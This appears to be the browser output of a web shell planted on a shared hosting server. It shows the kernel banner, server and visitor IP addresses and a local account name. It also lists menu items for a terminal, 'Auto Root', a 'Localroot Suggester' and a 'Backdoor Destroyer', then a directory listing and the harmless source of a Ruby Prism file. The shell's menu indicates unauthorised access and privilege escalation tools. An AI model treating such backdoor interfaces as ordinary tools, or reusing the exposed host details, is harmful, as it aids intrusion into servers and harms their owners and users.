Linux server165.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
Server IP : 68.65.122.53 & Your IP : 216.73.217.46
Domains :
Cant Read [ /etc/named.conf ]
User : vacazsti
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby40 /
share /
ruby /
prism /
Delete
Unzip
Name
Size
Permission
Date
Action
parse_result
[ DIR ]
drwxr-xr-x
2026-05-14 08:42
polyfill
[ DIR ]
drwxr-xr-x
2026-05-14 08:42
translation
[ DIR ]
drwxr-xr-x
2026-05-14 08:42
compiler.rb
23.17
KB
-rw-r--r--
2026-04-24 16:08
desugar_compiler.rb
9.89
KB
-rw-r--r--
2026-04-24 16:08
dispatcher.rb
111.71
KB
-rw-r--r--
2026-04-24 16:08
dot_visitor.rb
118.26
KB
-rw-r--r--
2026-04-24 16:08
dsl.rb
56.79
KB
-rw-r--r--
2026-04-24 16:08
ffi.rb
19.63
KB
-rw-r--r--
2026-04-24 16:08
inspect_visitor.rb
124.7
KB
-rw-r--r--
2026-04-24 16:08
lex_compat.rb
31.18
KB
-rw-r--r--
2026-04-24 16:08
lex_ripper.rb
1.5
KB
-rw-r--r--
2026-04-24 16:08
mutation_compiler.rb
21.1
KB
-rw-r--r--
2026-04-24 16:08
node.rb
623.78
KB
-rw-r--r--
2026-04-24 16:08
node_ext.rb
14.97
KB
-rw-r--r--
2026-04-24 16:08
pack.rb
5.88
KB
-rw-r--r--
2026-04-24 16:08
parse_result.rb
29.17
KB
-rw-r--r--
2026-04-24 16:08
pattern.rb
8.16
KB
-rw-r--r--
2026-04-24 16:08
reflection.rb
28.86
KB
-rw-r--r--
2026-04-24 16:08
relocation.rb
15.12
KB
-rw-r--r--
2026-04-24 16:08
serialize.rb
124.83
KB
-rw-r--r--
2026-04-24 16:08
string_query.rb
775
B
-rw-r--r--
2026-04-24 16:08
translation.rb
727
B
-rw-r--r--
2026-04-24 16:08
visitor.rb
22.79
KB
-rw-r--r--
2026-04-24 16:08
Save
Rename
# frozen_string_literal: true # :markup: markdown module Prism # Query methods that allow categorizing strings based on their context for # where they could be valid in a Ruby syntax tree. class StringQuery # The string that this query is wrapping. attr_reader :string # Initialize a new query with the given string. def initialize(string) @string = string end # Whether or not this string is a valid local variable name. def local? StringQuery.local?(string) end # Whether or not this string is a valid constant name. def constant? StringQuery.constant?(string) end # Whether or not this string is a valid method name. def method_name? StringQuery.method_name?(string) end end end